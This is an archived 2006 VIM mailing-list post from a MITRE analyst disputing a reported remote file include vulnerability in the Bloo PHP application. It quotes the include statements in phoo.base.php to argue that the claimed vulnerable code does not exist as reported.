[VIM] CVE dispute for Bloo RFI

Steven M. Christey coley at mitre.org
Tue Nov 21 17:31:53 EST 2006


Researcher: the_Edit0r
Ref: BUGTRAQ:20061116 Bloo => 1.00 Remote File Include Vulnerability
     http://www.securityfocus.com/archive/1/archive/1/451818/100/0/threaded


># CodE :
>include( $descriptorFileList );


In a diff of phoo.base.php (as of 20061110 back to March 2006):

  http://bloo.cvs.sourceforge.net/bloo/bloo/phoo.base.php?r1=1.1&r2=1.30.2.6

we see that there's no "include( $descriptorFileList );" but, in fact:

  @include( $descriptorFileList[ 0 ] );

  include( $descriptorFileList[ 0 ] );

and similar statements.

So, first of all, the claimed code doesn't appear to exist, at least
not in recent versions.

Second, phoo.base.php (as of 20061110) is laid out as:

  class PhooSession extends PhooBase {
  
    ...
  
     function loadThemes( $themeRoot, $virtualThemeLoadCommand = null ) {
  
    ...
  
                    /* read the theme descriptor */
                    include( $descriptorFileList[ 0 ] );

So, we have a variable use within a function definition.

For the version dating back to March 2006, we have:

  function verifyTheme( $themeRoot, $theme ) {
  
    ...
  
    @include( $descriptorFileList[ 0 ] );

and

  function loadTheme( $themeRoot, $theme ) {
  
    ...
  
      @include( $descriptorFileList[ 0 ] );


So, at best, the original report is incorrect for recent versions of
Bloo.


- Steve


More information about the VIM mailing list